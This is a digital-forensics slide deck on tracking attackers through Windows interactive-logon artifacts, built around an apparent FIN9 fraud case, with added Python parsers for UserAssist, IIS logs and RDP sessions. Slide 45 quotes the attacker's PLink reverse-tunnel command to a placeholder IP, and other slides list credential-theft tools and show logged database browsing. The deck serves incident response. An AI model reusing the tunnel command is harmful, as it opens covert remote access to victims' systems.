1
Using Interactive Artifacts to Track Attacker Actions
§ Phillip Kealy
2
Overview
§ Background
§ Disclaimer
§ Presentation Goals
§ Interactive Artifact Overview
§ Case Study + Interactive Artifacts
§ Scaling Investigations using Interactive Artifacts
3
Background
§ Who am I?
§ Career
- Operational
- CIRT
- Security Manager
- Consulting
4
DISCLAIMER
Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers.
In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
5
Presentation Goals
§ Define Methods for Interactive Logons
§ Provide overview of available artifacts
§ Methods to use multiple evidence sources to provide an in-depth story
6
What are Interactive artifacts?
§ Forensic Artifacts that record user activity during an interactive logon session
§ Examples of interactive logon sessions:
- Physically at the keyboard
- Remote Desktop
- Third Party Utilities
• Screen Connect
• VNC
• More
- PsExec
7
User Profiles
What happens upon a user’s first interactive logon?
§ Log Entries (More on this shortly)
§ Creation of user profile
- “C:\users\%USERNAME%”
- User registry hives
§ A user profile can prove an interactive logon occurred, even without event log evidence
(Diagram: frank → RDP → ITJumpServer; “C:\users\frank\*” created)
8
Case Study – FIN9
§ Financially Motivated Attacker
§ Uses minimal malware for initial access and to maintain presence
§ Exploits business processes and systems for financial gain
9
Targeted Attack Lifecycle – FIN9
• Phishing Email
• Word document with macros
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• Dameware
• NanoCore
• MimiKatz
• Keystroke logging
• Fake Logon Screen
• Sticky Keys
• Built-in Windows Utilities
• Net commands
• File shares
• Search for systems of interest
• Legitimate Access to apps
• Direct DB access using 1ClickDB
• Remote Desktop
• File Shares
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• SoftToken Certificate theft
10
Wipro + Brian Krebs
11
Initial Lead
§ Fraud Department located unauthorized gift cards issued on January 22, 2019
§ Suspicious rewards database interaction on January 22, 2019 traced back to WebServerA
§ Live response analysis indicated the attacker installed 1ClickDB via a Remote Desktop logon session on WebServerA using the Domain Admin account Frank
- RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address
§ IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer
- Connections to the 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC
§ Now what?
- Live response analysis of WebServerA
12
Windows Logon Events
Type 2 – Interactive
- Physical console
- Screen sharing
- “RunAs”
- PsExec
Type 10 – Remote Interactive
- Remote Desktop / Terminal Services
Type 7 – Credentials used to unlock screen
Type 12 – Cached remote interactive
Type 13 – Cached unlock
13
Type 10 Logon – RDP
An account was successfully logged on.
User Name: franktheadmin
Domain: Rewards
Logon ID: (0x0,0x151F248)
Logon Type: 10
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: ITJumpServer
Source Network Address: 192.168.1.101
(Diagram: Unknown System → RDP → ITJumpServer; “Rewards” Domain Controller; Security Event Log EID 4624)
14
RDP Event Logs
Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
Date & Time | EID | Message
2019-01-22 01:33:23 | 1149 | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | 21 | Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 02:39:45 | 23 | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | 24 | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
15
User Registry Hives
Registry Files on Disk | Registry Hive Paths
\Users\<username>\NTUSER.DAT (Windows Vista/2008+) | HKEY_USERS\<User SID>
\Users\<username>\AppData\Local\Microsoft\Windows\USRCLASS.DAT (Windows Vista/2008+) | HKEY_USERS\<User SID>_Classes
16
LNK Files
§ Windows shortcut files
§ Auto-generated when a file is opened in Explorer
§ Supports “Recent Files” / “Recent Docs” functionality
Windows Vista, 7, Server 2008 – LNK File Paths
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent
17
Data within LNK Files
§ Full file path (local or network)
§ Attributes and logical size
§ MAC timestamps for the referenced file at the time it was last opened
§ Output from “lnkparse.py” (screenshot)
lnkparse.py - sourceforge.net/projects/jafat/files/lnk-parse/
18
LNK File of interest
Date & Time | Timestamp | File Name
2019-01-22 01:39:23 | Created | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
Referenced file (from the LNK contents):
Date & Time | Timestamp | File Name
2019-01-22 01:36:23 | Created, Modified, Accessed | C:\Users\dave\Desktop\result.txt
19
Most Recently Used (MRU) Keys
“RecentDocs” – recently opened files; multiple subkeys for file types (.ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc.)
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
§ Binary Format
§ Stores most recent 10 opened files
Key Last Write | Registry Key | Parsed MRU Value
2019-01-22 01:36:23 | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt | 0 = result.txt
2019-01-22 01:35:34 | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip | 0 = omg.zip
20
Anatomy of a Registry Key
Example: Run key
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value Name: NotMalware
Value Data: C:\ProgramData\TotallyMalware\Evil.exe
21
Anatomy of a Registry Key
Example: Run key
Key Last Modified: 2017-06-05 19:33:51
§ Values inherit Last Modified time from their parent key
22
Registry Timestamps
A timestamp is applied to the ‘Key’, and is updated when…
1) Key created 2) Value created/deleted 3) Data of any Value is modified
Note: Registry timestamps can be modified, although this is not very common
23
Evidence of Execution
Artifact | Default Enabled | User Agnostic | All Windows Versions | Execution Visibility
ShimCache | Yes | Yes | Yes | Yes
AmCache | Yes | Yes | No | Yes
UserAssist | Yes | No | Yes | GUI only
MUICache | Yes | No | Yes | GUI only
Prefetch | Workstations only | Yes | Yes | Yes
Windows Events | No | Yes | Yes | Yes
WMI RUA | No | Yes | Yes | Yes
24
UserAssist and MUICache
Tracks files opened in Windows Explorer
HKCU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
HKCU\{SID}\Software\Microsoft\Windows\ShellNoRoam\MUICache
UserAssist
- One value per executable file
  • ROT13 encoded
- Number of times each program ran
- Last execution time
MUICache
- One value per executable file
  • Clear-text
- Records “FileDescription” for PE files
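Decoding UserAssist values as the slide describes, as an added example (this is not code from the deck): the value names are ROT13-decoded, the known-folder GUID seen in the deck's decoded table is expanded, and the run count and last-execution FILETIME are read from the binary data in both the Windows 7+ (72-byte) and the legacy XP (16-byte) layouts. The sample records are constructed here to match the decoded table shown later in the deck.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# Known-folder GUID that appears in the deck's decoded UserAssist table (FOLDERID_System).
# Extend this map with further known-folder GUIDs as needed.
KNOWN_FOLDERS = {
    "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}": "%SystemRoot%\\System32",
}

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int):
    """Windows FILETIME (100-ns ticks since 1601-01-01 UTC) -> aware datetime, or None if unset."""
    if ft == 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, using integer arithmetic to avoid float rounding."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def decode_name(value_name: str) -> str:
    """ROT13-decode a UserAssist value name and expand a leading known-folder GUID."""
    decoded = codecs.decode(value_name, "rot13")
    for guid, folder in KNOWN_FOLDERS.items():
        if decoded.upper().startswith(guid):
            decoded = folder + decoded[len(guid):]
    return decoded


def parse_userassist_value(value_name: str, data: bytes) -> dict:
    """Decode one value under UserAssist\\{GUID}\\Count into path, run count and last run time."""
    if len(data) == 72:
        # Windows 7+: session(4) run_count(4) focus_count(4) focus_time(4) 10 floats(40)
        # unknown(4) last_run FILETIME(8) unknown(4)
        run_count = struct.unpack_from("<I", data, 4)[0]
        last_run = filetime_to_datetime(struct.unpack_from("<Q", data, 60)[0])
    elif len(data) == 16:
        # Windows XP/2003: session(4) count(4, starts at 5) last_run FILETIME(8)
        run_count = max(struct.unpack_from("<I", data, 4)[0] - 5, 0)
        last_run = filetime_to_datetime(struct.unpack_from("<Q", data, 8)[0])
    else:
        raise ValueError(f"unexpected UserAssist data length: {len(data)}")
    return {"path": decode_name(value_name), "run_count": run_count, "last_run": last_run}


def decode_count_key(values: dict) -> list:
    """Decode every value of a Count subkey, ordered by last execution time (unset times first)."""
    rows = [parse_userassist_value(name, data) for name, data in values.items()]
    return sorted(rows, key=lambda r: r["last_run"] or FILETIME_EPOCH)


# ---- constructed sample mirroring the deck's decoded UserAssist table ----
def _win7_record(run_count: int, last_run: datetime) -> bytes:
    """Build a 72-byte Windows 7+ record carrying the given count and FILETIME."""
    return (struct.pack("<IIII", 0, run_count, 0, 0) + b"\x00" * 44
            + struct.pack("<Q", datetime_to_filetime(last_run)) + b"\x00" * 4)


UTC = timezone.utc
SAMPLE_COUNT_VALUES = {  # value name (ROT13, as stored in the hive) -> binary data
    codecs.encode("{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\msiexec.exe", "rot13"):
        _win7_record(1, datetime(2019, 1, 22, 1, 36, 23, tzinfo=UTC)),
    codecs.encode("C:\\Users\\dave\\Desktop\\omg.exe", "rot13"):
        _win7_record(1, datetime(2019, 1, 22, 1, 39, 23, tzinfo=UTC)),
    codecs.encode("{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\mstsc.exe", "rot13"):
        _win7_record(3, datetime(2019, 1, 22, 2, 28, 1, tzinfo=UTC)),
}

if __name__ == "__main__":
    for row in decode_count_key(SAMPLE_COUNT_VALUES):
        when = row["last_run"].strftime("%Y-%m-%d %H:%M:%S") if row["last_run"] else "never"
        print(f"{when}  {row['run_count']:>3}  {row['path']}")
```

On a real system the value names and data come from the user's NTUSER.DAT under the UserAssist\{GUID}\Count subkeys; RegRipper's userassist plugin produces the same decoding shown on the next slides.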
25
UserAssist Evidence
userassist v.20080726
(NTUSER.DAT) Displays contents of UserAssist Active Desktop key
UserAssist (Active Desktop)
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
LastWrite Time Fri Jul 29 21:46:41 2011 (UTC)
Fri Jul 29 21:46:41 2017 (UTC)
UEME_RUNPATH (3)
UEME_RUNPATH:C:\Program Files\7-Zip\7zFM.exe (1)
Fri Jul 29 21:46:17 2017 (UTC)
UEME_RUNPATH:C:\Program Files\Windows NT\Accessories\WORDPAD.EXE (1)
Fri Jul 29 21:44:45 2017 (UTC)
UEME_RUNPIDL:%csidl2%\Internet Explorer.lnk (15)
UEME_RUNPATH:C:\Program Files\Internet Explorer\IEXPLORE.EXE (1)
(Screenshots: raw contents of the UserAssist key; decoded UserAssist data)
26
MUICache Evidence
(Screenshot: raw contents of the MUICache key)
27
Decoded UserAssist Data
Key Last Write | Registry Key | Times Executed
2019-01-22 01:36:23 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\msiexec.exe | 1
2019-01-22 01:33:48 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ServerManager.exe | 1
2019-01-22 01:39:23 | C:\Users\dave\Desktop\omg.exe | 1
2019-01-22 01:43:23 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc | 1
2019-01-22 01:44:56 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe | 1
2019-01-22 02:28:01 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe | 3
28
Jump Lists
§ Provides user quick access to recently used apps
§ Each user has their own jump lists
§ Shows evidence of accessed resources
§ Two types of jump lists
§ Requires parsing to be human readable
- JumpListParser, JLECmd, jmp
Automatic: %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations
Custom: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations
29
Jump Lists
§ Automatic – created automatically when a user interacts with a resource
§ Custom – created when a user “pins” an item
30
Browser History, Cache, and Downloads
§ User Specific Artifact
§ Enumerate Browsers
§ Extract Browsing History
§ Collect Browser Cache
§ Collect Downloaded Files
31
Web Server Side Data - Logging GET vs. POST
GET Requests
- “Retrieve” content specified in the request address
- Key-value pairs passed as part of the URI
- Fully captured in logs (cs-uri-query)
POST Requests
- Tell the server to accept the data enclosed in the packet contents
- Key-value pairs passed in the message body
- Request parameters not logged
Impact: Malicious activity in POST requests can be hard to detect!
32
Web Server Side Data - Content Encoding
§ Special characters in HTTP requests are URL Encoded by the web browser
- % followed by ASCII character code
- Spaces can be represented by %20 or +
http://www.foo.com/search.aspx?name=John & Mark Co.&op=1
…is converted to (and will be logged as)…
http://www.foo.com/search.aspx?name=John%20%26%20Mark%20Co.&op=1
33
GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG"
GET /images/Schema.asp
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_USERS"&
GET /images/Connect.asp
GET /images/Schema.asp
GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM>_USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A=
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
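Reading IIS W3C log lines the way the two preceding slides describe, as an added example (not code from the deck): the #Fields header maps the columns, cs-uri-query is URL-decoded (with + as a space) so the 1ClickDB browse parameters can be read as the server saw them, and POST requests are flagged because their body parameters are never logged. The log lines are constructed here; the table placeholder <SYSTEM>_USERS is kept from the deck's redaction.

```python
from urllib.parse import parse_qsl

# Constructed sample in IIS W3C extended format (the deck shows only cs-method and cs-uri).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-01-22 01:45:33 10.0.0.5 GET /images/Schema.asp - 80 192.168.1.101 200
2019-01-22 01:46:10 10.0.0.5 GET /images/Browse.asp sqlfrom_A=%22dbo%22.%22%3CSYSTEM%3E_USERS%22 80 192.168.1.101 200
2019-01-22 01:47:02 10.0.0.5 GET /images/Browse.asp sqlorderby_A=&sqlwhere_A=(%22last_name%22+Like+%27NAME%25%27)&sqlpagesize_A=10&sqlfrom_A=%22dbo%22.%22%3CSYSTEM%3E_USERS%22 80 192.168.1.101 200
2019-01-22 02:30:12 10.0.0.5 POST /images/Command.asp nocache=1/22/2019+2:30:12+AM 80 192.168.1.101 200
"""


def parse_w3c(text: str) -> list:
    """Return one dict per log entry, keyed by the names in the most recent #Fields line."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # IIS may emit a new #Fields line mid-file
        elif line and not line.startswith("#"):
            values = line.split(" ")
            if len(values) == len(fields):    # skip truncated or foreign lines
                rows.append(dict(zip(fields, values)))
    return rows


def decode_query(row: dict) -> dict:
    """Decode the logged query string; mark POSTs whose parameters live in the unlogged body."""
    query = row.get("cs-uri-query", "-")
    # parse_qsl splits on & before unquoting, so an encoded %26 inside a value stays a literal &.
    params = {} if query == "-" else dict(parse_qsl(query, keep_blank_values=True))
    return {
        "time": f"{row['date']} {row['time']}",
        "client": row.get("c-ip"),
        "method": row["cs-method"],
        "stem": row["cs-uri-stem"],
        "params": params,
        "body_logged": row["cs-method"].upper() != "POST",
    }


def review(text: str) -> dict:
    """Summarise what the server-side log can show (tables browsed) and cannot (POST bodies)."""
    entries = [decode_query(r) for r in parse_w3c(text)]
    tables = sorted({e["params"]["sqlfrom_A"] for e in entries if "sqlfrom_A" in e["params"]})
    unlogged = [f"{e['time']} {e['method']} {e['stem']}" for e in entries if not e["body_logged"]]
    return {"entries": entries, "tables_browsed": tables, "body_not_logged": unlogged}


if __name__ == "__main__":
    result = review(SAMPLE_LOG)
    for e in result["entries"]:
        print(e["time"], e["client"], e["method"], e["stem"],
              e["params"] if e["body_logged"] else "(parameters in body, not logged)")
    print("tables browsed:", result["tables_browsed"])
    print("needs other evidence:", result["body_not_logged"])
```

For the POST entries the only parameters available are the ones in the query string (here the nocache timestamp); the rest must come from host artifacts such as the browser cache covered on the following slides.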
34
What do we know so far?
Time | Source | Details
2019-01-22 01:33:23 | EventLog | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | EventLog | Remote Desktop Services: Session logon succeeded User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 01:35:34 | Registry:LastWrite | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
2019-01-22 01:39:03 | LNK:Create Time | C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
2019-01-22 01:39:23 | FN:Create Time | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:39:23 | Registry:LastWrite | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
2019-01-22 01:39:23 | UserAssist:Dave | C:\Users\dave\Desktop\omg.exe
2019-01-22 01:43:23 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
2019-01-22 01:44:56 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
2019-01-22 01:45:33 | IE:BrowserCache | Earliest Browser Cache Artifact Created
2019-01-22 02:28:01 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
2019-01-22 02:30:12 | IE:BrowserCache | Most Recent Browser Artifact Modified
2019-01-22 02:39:45 | EventLog | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | EventLog | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
§ What next?
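Bounding user artifacts by the RDP session that produced them, as an added example (not the deck's code): the session window comes from the EID 21 session logon and the EID 23/24 logoff/disconnect events in the table above, and each registry, LNK, UserAssist and browser-cache artifact is attributed to the session whose user and time window contain it. The sample rows are transcribed from the slide; one extra UserAssist entry outside the window is constructed to show how orphans are surfaced for follow-up.

```python
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional


@dataclass
class Session:
    user: str
    session_id: int
    source_ip: Optional[str]
    start: datetime
    end: Optional[datetime] = None
    artifacts: List[tuple] = field(default_factory=list)


def parse_ts(s: str) -> datetime:
    """Timestamps in the deck's tables are 'YYYY-MM-DD HH:MM:SS' in UTC."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def build_sessions(events: list) -> List[Session]:
    """Pair each EID 21 (session logon) with the later EID 23/24 for the same session ID.

    events: (timestamp, eid, user, session_id, source_ip) tuples, in any order.
    EID 1149 only proves the user authenticated, so it never opens a session here.
    """
    sessions, open_by_id = [], {}
    for ts, eid, user, sid, ip in sorted(events, key=lambda e: parse_ts(e[0])):
        if eid == 21:
            s = Session(user, sid, ip, parse_ts(ts))
            sessions.append(s)
            open_by_id[sid] = s
        elif eid in (23, 24) and sid in open_by_id:
            s = open_by_id[sid]
            t = parse_ts(ts)
            s.end = t if s.end is None else max(s.end, t)
    return sessions


def attribute(sessions: List[Session], artifacts: list) -> list:
    """Attach (timestamp, source, user, detail) artifacts to a session; return the orphans.

    An artifact belongs to a session when the user matches and its time falls inside
    [start, end]; a session with no logoff/disconnect yet is treated as still open.
    """
    orphans = []
    for ts, source, user, detail in artifacts:
        t = parse_ts(ts)
        hit = next((s for s in sessions
                    if s.user.lower() == user.lower()
                    and s.start <= t and (s.end is None or t <= s.end)), None)
        (hit.artifacts if hit else orphans).append((t, source, detail))
    for s in sessions:
        s.artifacts.sort()
    return orphans


# ---- sample data transcribed from the deck's tables (assembled here) ----
RDP_EVENTS = [
    ("2019-01-22 01:33:23", 1149, "rewards\\dave", None, "192.168.1.101"),
    ("2019-01-22 01:33:23", 21, "rewards\\dave", 2, "192.168.1.101"),
    ("2019-01-22 02:39:45", 23, "rewards\\dave", 2, None),
    ("2019-01-22 02:39:45", 24, "rewards\\dave", 2, "192.168.1.101"),
]
ARTIFACTS = [
    ("2019-01-22 01:35:34", "Registry:LastWrite", "rewards\\dave", "RecentDocs\\.zip -> omg.zip"),
    ("2019-01-22 01:39:23", "LNK:Create", "rewards\\dave", "Recent\\result.txt.lnk"),
    ("2019-01-22 01:39:23", "UserAssist", "rewards\\dave", "C:\\Users\\dave\\Desktop\\omg.exe"),
    ("2019-01-22 02:28:01", "UserAssist", "rewards\\dave", "mstsc.exe (3 runs)"),
    ("2019-01-22 02:30:12", "IE:BrowserCache", "rewards\\dave", "most recent cache artifact"),
    # Constructed: outside the session window, so another logon (or clock skew) must explain it.
    ("2019-01-22 03:10:00", "UserAssist", "rewards\\dave", "notepad.exe (constructed)"),
]

if __name__ == "__main__":
    sessions = build_sessions(RDP_EVENTS)
    orphans = attribute(sessions, ARTIFACTS)
    for s in sessions:
        print(f"{s.user} session {s.session_id} from {s.source_ip}: {s.start} -> {s.end}")
        for t, source, detail in s.artifacts:
            print(f"  {t}  {source:<20} {detail}")
    for t, source, detail in orphans:
        print(f"UNATTRIBUTED {t}  {source:<20} {detail}")
```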
35
Attack Diagram
(Diagram: Unknown System → Remote Desktop → Jump Server → Web Access (1ClickDB) → Web Server → Direct DB Access → Database Server)
36
RDP Event Logs
Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
Date & Time | EID | Message
2018-12-24 23:11:21 | 1149 | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2019-01-22 00:23:33 | 1149 | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
37
RDP MRU Keys
38
RDP MRU Keys
Key Last Write | Registry Key
2018-12-25 00:00:23 | Hostname: 192.168.1.38 User: rewards\ITAdmin
2018-12-25 00:33:42 | Hostname: RewardsDB User: rewards\DBO
2019-01-01 02:53:11 | Hostname: Webserver2 User: rewards\frank
2019-01-15 00:15:01 | Hostname: ITJumpserver User: rewards\dave
39
RDP Bitmap Cache Files
§ Store frequently used images used during RDP session
§ Improves user experience
§ Located at:
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache2.bmc
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\Cache[0-9]{4}.bin
40
41
Uninstall or Disable Endpoint Agents
42
Registry Shellbags
§ Windows Explorer usage
§ Records size, position, view of windows
§ Provides evidence of user access to local & remote directories
Registry keys:
HKEY_USERS\{SID}\Software\Microsoft\Windows\Shell
HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam
File on disk (Windows Vista/2008+):
\Users\<username>\AppData\Local\Microsoft\Windows\USRCLASS.DAT
43
Registry Shellbags
Decoded shellbag keys can provide
- Paths to directories accessed via Explorer
- Date and time at which last access occurred
- MAC times of each path tracked in shellbags
Decoding tools
- RegRipper
- shellbags.py github.com/williballenthin/shellbags
- ShellBagsExplorer
• https://ericzimmerman.github.io/#!index.md
44
ShellBags
MRU Time | Modified | Accessed | Created | Resource
2019-01-11 03:51:36 | 2018-12-30 02:59:32 | 2016-12-30 02:59:32 | 2017-11-05 14:40:54 | My Computer\C:\Users\ITAdmin [Desktop0043]
2019-01-11 03:51:54 | 2018-05-07 15:54:36 | 2016-11-05 14:40:54 | 2017-11-05 14:40:54 | My Computer\C:\Users\ITAdmin\AppData [Desktop00430]
| | | | My Network Places\hqdc1.com\hqdc1.com\general [Desktop240]
2018-12-25 02:40:59 | 2012-11-11 17:00:06 | 2012-11-11 17:00:06 | 2012-11-11 17:00:06 | My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop2400]
2018-12-25 02:40:59 | 2014-05-23 21:53:24 | 2018-05-23 21:53:24 | 2011-04-07 12:28:28 | My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [
2019-01-12 03:41:41 | 2017-01-10 14:07:12 | 2017-01-10 14:07:12 | 2017-05-02 13:45:42 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop290000]
2019-01-12 03:42:22 | 2017-01-11 18:42:04 | 2017-01-11 18:42:04 | 2017-01-10 14:06:56 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop2900000]
2019-01-12 03:47:49 | 2017-01-05 21:37:52 | 2017-01-05 21:37:52 | 2017-01-05 20:05:26 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop2900001]
2019-01-12 03:41:42 | 2016-12-18 14:49:14 | 2016-12-18 14:49:14 | 2015-01-26 19:43:56 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop2900002]
2019-01-12 03:53:14 | 2016-12-15 20:57:58 | 2016-12-15 20:57:58 | 2016-11-24 22:18:00 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop2900003]
2019-01-12 03:53:47 | 2015-09-23 13:52:10 | 2015-09-23 13:52:10 | 2016-05-02 13:45:42 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop290001]
2019-01-11 03:46:21 | 2016-09-27 13:38:42 | 2016-09-27 13:38:42 | 2016-05-02 13:45:42 | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop2900010]
45
How did the attacker access the host?
§ Remotely installed ScreenConnect
§ Switched tactics and removed ScreenConnect / installed malware
§ Non-interactive malware used to download and execute PLink.exe to create a tunnel
- tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389
§ Connected to local host using Remote Desktop
Key | Value | Data
Software\SimonTatham\PuTTY\SshHostKeys | rsa2@<IP Address> | 0x10001,0x (truncated; SSH Public Key)
46
Windows 10 Timeline
§ Timeline exists in Task View
- Accessed by hitting Win+Tab
§ Records timeline of user activity for specific applications
§ User Engaged
§ Generic Events
§ Database location:
- C:\Users\User\AppData\Local\ConnectedDevicesPlatform\L.User\ActivitiesCache.db
47
Windows Timeline
https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
49
Windows Timeline
§ Parsing
- Multiple Available Tools
• https://tzworks.net/prototype_page.php?proto_id=41
• https://github.com/log2timeline/plaso/pull/2076
• https://ericzimmerman.github.io/#!index.md
- SQLite3
50
Windows 10 Timeline
Start - UTC | End - UTC | Application | DisplayText or Type | Details
2019-02-08 23:04:27 | N/A | WinRAR\WinRAR.exe | sdl-redline.zip | Z:\Downloads\sdl-redline.zip
2019-02-09 01:07:06 | N/A | Cisco.AnyConnect | Cisco AnyConnect Secure Mobility Client | black
2019-02-10 13:09:53 | N/A | Microsoft.MicrosoftEdge | cmd - Bing | https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json
2019-02-10 13:10:34 | 2019-02-10 13:10:51 | Microsoft.MicrosoftEdge | UserEngaged | https://ericzimmerman.github.io/#!index.md
2019-02-12 13:58:46 | 2019-02-12 13:58:48 | Microsoft.MicrosoftEdge | UserEngaged | https://www.google.com/search?eiadd+on+vpn&oq=add+on+vpn
2019-02-12 13:59:02 | N/A | Wireshark\Wireshark.exe | Wireshark | black
2019-02-12 18:57:11 | N/A | Wireshark\Wireshark.exe | 107.x.x.x-10.24.206.133-1552495684.flow | Z:\Downloads\107.x.x.x-10.24.206.133-1552495684.flow
2019-02-12 19:02:27 | N/A | Wireshark\Wireshark.exe | 104.x.x.x-10.222.7.44-1552442420.flow | Z:\Downloads\104.x.x.x-10.222.7.44-1552442420.flow
2019-02-16 00:47:42 | N/A | Microsoft.MSPaint | Paint 3D | black
2019-02-16 00:50:34 | N/A | Microsoft.MSPaint | Picture2.jpg | Z:\Desktop\Picture2.jpg
2019-02-16 03:16:13 | N/A | mspaint.exe | Picture1.png | Z:\Presentations\DFIR\Picture1.png
2019-02-16 03:16:56 | N/A | mspaint.exe | Picture2.png | Z:\Presentations\DFIR\Picture2.png
2019-02-16 18:41:00 | N/A | WinRAR\WinRAR.exe | 4mXTuLp5E19cNdVvUX9jzb.zip | Z:\Downloads\TuLp5E19cNdVvUX9jzb.zip
2019-02-16 18:41:33 | N/A | Redline\Redline.exe | MBP0074.mans | Z:\MBP0074.mans
51
Attack Diagram
